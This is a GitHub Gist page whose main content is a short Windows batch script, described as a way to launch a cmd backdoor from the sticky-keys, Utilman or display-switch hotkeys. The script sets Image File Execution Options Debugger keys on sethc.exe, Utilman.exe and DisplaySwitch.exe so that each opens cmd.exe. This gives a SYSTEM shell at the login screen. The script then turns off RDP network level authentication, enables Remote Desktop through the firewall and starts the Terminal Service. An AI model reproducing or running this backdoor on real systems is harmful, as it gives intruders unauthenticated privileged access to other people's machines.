-
-
Save tuantmb/dff5f5bd77f60f54cd0d48d4e12a4a70 to your computer and use it in GitHub Desktop.
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f | |
netsh firewall set service type = remotedesktop mode = enable | |
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | |
net start TermService |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment